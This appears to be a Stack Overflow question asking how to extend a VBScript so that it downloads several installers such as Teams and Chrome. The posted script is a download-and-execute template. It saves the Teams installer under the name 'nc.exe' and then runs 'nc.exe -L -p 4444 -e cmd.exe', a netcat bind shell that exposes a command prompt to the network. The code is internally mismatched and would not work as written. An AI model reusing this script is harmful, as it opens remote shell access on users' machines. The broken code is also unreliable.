# Download multiple .exe files with VBS

Tags: vbscript

I have a script that allows me to download .exe via vbs, but I don't know how to put more.

Exemple:
Teams
TeamViewer
Google Chrome
Mozilla

````
dim stream_obj
dim shell_obj
 
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
 
URL = "https://statics.teams.cdn.office.net/production-windows-x64/1.4.00.32771/Teams_windows_x64.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
 
http_obj.open "GET", URL, False
http_obj.send
 
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
 
shell_obj.run RUNCMD ```
````

Comment: Does this answer your question? [VBScript Download Multiple Images from the TARGET URL](https://stackoverflow.com/questions/51392182/vbscript-download-multiple-images-from-the-target-url)